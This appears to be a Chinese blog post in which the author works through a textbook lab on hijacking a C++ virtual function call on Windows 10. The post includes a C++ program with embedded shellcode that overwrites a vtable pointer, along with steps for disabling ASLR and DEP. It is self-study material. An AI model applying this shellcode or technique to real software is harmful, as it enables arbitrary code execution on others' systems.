<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="google-site-verification" content="1A53JNVAb5cVMzo7F3mX6qx7FdXoQGzD4kw6gWUAH9o">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="在《0day安全——软件安全分析》一书的6.3节提供了C++虚函数的攻击概念，本文为对应章节的具体实操。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162// 6-3-attack-virtual-func.cpp :">
<meta name="keywords" content="C++虚函数,栈溢出">
<meta property="og:type" content="article">
<meta property="og:title" content="0day-win10下实现攻击C++的虚函数">
<meta property="og:url" content="http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/index.html">
<meta property="og:site_name" content="糖醋大白菜 の 后花园">
<meta property="og:description" content="在《0day安全——软件安全分析》一书的6.3节提供了C++虚函数的攻击概念，本文为对应章节的具体实操。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162// 6-3-attack-virtual-func.cpp :">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0082zybpgy1gbtsk8goxuj31bg0icdi0.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0082zybpgy1gbttfamimbj30lu0f40wm.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0082zybpgy1gbtti0xvs2j30xu0bw42n.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0082zybpgy1gbttok7l1yj30sa0ant97.jpg">
<meta property="og:updated_time" content="2020-02-12T11:36:44.468Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0day-win10下实现攻击C++的虚函数">
<meta name="twitter:description" content="在《0day安全——软件安全分析》一书的6.3节提供了C++虚函数的攻击概念，本文为对应章节的具体实操。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162// 6-3-attack-virtual-func.cpp :">
<meta name="twitter:image" content="https://tva1.sinaimg.cn/large/0082zybpgy1gbtsk8goxuj31bg0icdi0.jpg">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>0day-win10下实现攻击C++的虚函数</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">HOME</a></li>
         
          <li><a href="/archives/">ARTICLES</a></li>
         
          <li><a href="/categories/">CATEGORIE</a></li>
         
          <li><a href="/tags/">TAGs</a></li>
         
          <li><a href="/about/">ABOUT</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/02/23/保持ssh连接，防止ssh连接自动断开的方法总结/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/02/05/命令集合(持续更新)/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&text=0day-win10下实现攻击C++的虚函数"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&is_video=false&description=0day-win10下实现攻击C++的虚函数"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=0day-win10下实现攻击C++的虚函数&body=Check out this article: http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&name=0day-win10下实现攻击C++的虚函数&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        0day-win10下实现攻击C++的虚函数
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">糖醋大白菜 の 后花园</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-02-12T07:46:20.811Z" itemprop="datePublished">2020-02-12</time>
        
        (Updated: <time datetime="2020-02-12T11:36:44.468Z" itemprop="dateModified">2020-02-12</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/C/">C++</a> › <a class="category-link" href="/categories/C/0day/">0day</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/C-虚函数/">C++虚函数</a>, <a class="tag-link" href="/tags/栈溢出/">栈溢出</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>在《0day安全——软件安全分析》一书的6.3节提供了C++虚函数的攻击概念，本文为对应章节的具体实操。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 6-3-attack-virtual-func.cpp : This file contains the 'main' function. Program execution begins and ends there.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">"windows.h"</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _CRT_SECURE_NO_WARNINGS</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="comment">// <span class="doctag">TODO:</span> 学习写shellcode，并且将十六进制字符转为代码</span></span><br><span class="line"><span class="keyword">char</span> shellcode[] = <span class="string">"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"</span></span><br><span class="line">					<span class="string">"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"</span></span><br><span class="line">					<span class="string">"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"</span></span><br><span class="line">					<span class="string">"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"</span></span><br><span class="line">					<span class="string">"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"</span></span><br><span class="line">					<span class="string">"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"</span></span><br><span class="line">					<span class="string">"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"</span></span><br><span class="line">					<span class="string">"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"</span></span><br><span class="line">					<span class="string">"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"</span></span><br><span class="line">					<span class="string">"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"</span></span><br><span class="line">					<span class="string">"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"</span> </span><br><span class="line">					<span class="string">"\x64\xD3\x41\x00"</span>; <span class="comment">//set fake virtual function pointer,180 Byte // 176Byte</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 0x0041d364+0XB0 = 0x0041d414</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 0x0040881C 地址为buf入口的地址（也就是shellcode入口的地址），0x004088CC 地址为伪造的虚函数地址</span></span><br><span class="line"><span class="comment">// 改地址可以放在shellcode前面也可以放在shellcode后面，在编译的时候将地址随机化和DEP关闭。</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Failwest</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">	<span class="keyword">char</span> buf[<span class="number">200</span>];</span><br><span class="line">	<span class="function"><span class="keyword">virtual</span> <span class="keyword">void</span> <span class="title">test</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">		<span class="built_in">cout</span> &lt;&lt; <span class="string">"Class Vtable::test()"</span> &lt;&lt; <span class="built_in">endl</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Failwest overflow, * p;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span>* p_vtable;</span><br><span class="line">	</span><br><span class="line">	p_vtable = overflow.buf - <span class="number">4</span>; <span class="comment">//point to virtual table，虚表指针位于char buf[200]之前，通过这句代码定位到该指针。</span></span><br><span class="line"></span><br><span class="line">	</span><br><span class="line">	<span class="comment">//reset fake virtual table to 0x004088cc</span></span><br><span class="line">	<span class="comment">//the address may need to ajusted via runtime debug p_vtable[0]=0xCC;</span></span><br><span class="line">	</span><br><span class="line"></span><br><span class="line">	<span class="comment">// 0x0041d414</span></span><br><span class="line">	<span class="comment">// ask: 这里如果直接改成buf的地址，即虚表指针指向shellcode首地址，为什么不可以</span></span><br><span class="line">	p_vtable[<span class="number">0</span>] = <span class="number">0x14</span>;</span><br><span class="line">	p_vtable[<span class="number">1</span>] = <span class="number">0xd4</span>;</span><br><span class="line">	p_vtable[<span class="number">2</span>] = <span class="number">0x41</span>;</span><br><span class="line">	p_vtable[<span class="number">3</span>] = <span class="number">0x00</span>;</span><br><span class="line">	<span class="built_in">strcpy</span>(overflow.buf, shellcode); <span class="comment">//set fake virtual functionpointer </span></span><br><span class="line"></span><br><span class="line">	p = &amp;overflow;</span><br><span class="line">   	p-&gt;test();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>了解了C++虚函数的调用过程之后，我们就明白了这个代码利用了栈中的缓冲区溢出，攻击流程为：修改虚表指针的内容，将其指向shellcode的首部或者尾部（这个时候shellcode 已经被复制到缓冲区中），这个代码给的是将 虚表指针指向buf缓冲区(shellcode)的尾部，然后再将虚表中 的虚函数指针指向shellcode的首部来执行代码，那么我们如何得到这个shellcode的地址？</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gbtsk8goxuj31bg0icdi0.jpg" alt></p>
<p>因为C++的虚函数在调用的时候，程序会先通过虚表指针寻找虚函数的地址，这里虚函数的地址为修改 <strong>0x0041d414</strong>，然后再修改“虚函数”的地址指向shellcode，这里“虚函数”的实际入口地址为 shellcode的尾部的8字节地址<strong>0x0041d364</strong>。</p>
<p>还有一个问题是，visual studio2019 默认开启ASLR和DEP，我们需要在系统和编译选项中将其关闭，win10关闭ASLR比较容易，直接在设置里面就可以直接关闭，具体参见这篇文章：<a href="https://ctf.dontpanic.blog/notes/stack-buffer-overflow-aslr.html" target="_blank" rel="noopener">栈缓冲区溢出之二 ASLR</a> ；然后在项目的选项中修改ASLR和DEP为disable即可（项目选项—&gt;链接器—&gt;高级）。<br><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gbttfamimbj30lu0f40wm.jpg" alt></p>
<p>由于ASLR和DEP都已经关闭了，所以直接通过VS  的Debug —&gt; Windows —&gt; Watch (Autos)观看变量的地址。<br><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gbtti0xvs2j30xu0bw42n.jpg" alt><br>这里得到overflow.buf的地址，我们要得到shellcode的末尾8字节的地址，就需要加上中间176个字节的shellcode字节码，即 0x0041d364+0XB0 = 0x0041d414，所以在p_vtable中填入这个地址。<br><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gbttok7l1yj30sa0ant97.jpg" alt></p>
<p>最后，在这个过程中，我直接修改虚表指针指向buf的首地址为什么不可以？</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">HOME</a></li>
         
          <li><a href="/archives/">ARTICLES</a></li>
         
          <li><a href="/categories/">CATEGORIE</a></li>
         
          <li><a href="/tags/">TAGs</a></li>
         
          <li><a href="/about/">ABOUT</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&text=0day-win10下实现攻击C++的虚函数"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&is_video=false&description=0day-win10下实现攻击C++的虚函数"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=0day-win10下实现攻击C++的虚函数&body=Check out this article: http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&title=0day-win10下实现攻击C++的虚函数"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/02/12/0day-win10下攻击C++虚函数/&name=0day-win10下实现攻击C++的虚函数&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2020 糖醋大白菜
  </div>
  <div class="footer-right">
    <span id="busuanzi_container_site_uv">本站总访客数 <span id="busuanzi_value_site_uv"></span> 人</span>
    <span id="busuanzi_container_site_pv">本站总访问量 <span id="busuanzi_value_site_pv"></span> 次</span>
    <!-- <nav>
      <ul>
         
          <li><a href="/">HOME</a></li>
         
          <li><a href="/archives/">ARTICLES</a></li>
         
          <li><a href="/categories/">CATEGORIE</a></li>
         
          <li><a href="/tags/">TAGs</a></li>
         
          <li><a href="/about/">ABOUT</a></li>
        
      </ul>
    </nav> -->
  </div>
  
</footer>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<!-- clipboard -->

  <script src="/lib/clipboard/clipboard.min.js"></script>
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight .code pre").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      target: function(trigger) {
        return trigger.nextElementSibling;
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'flowerlake';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


</body>
</html>
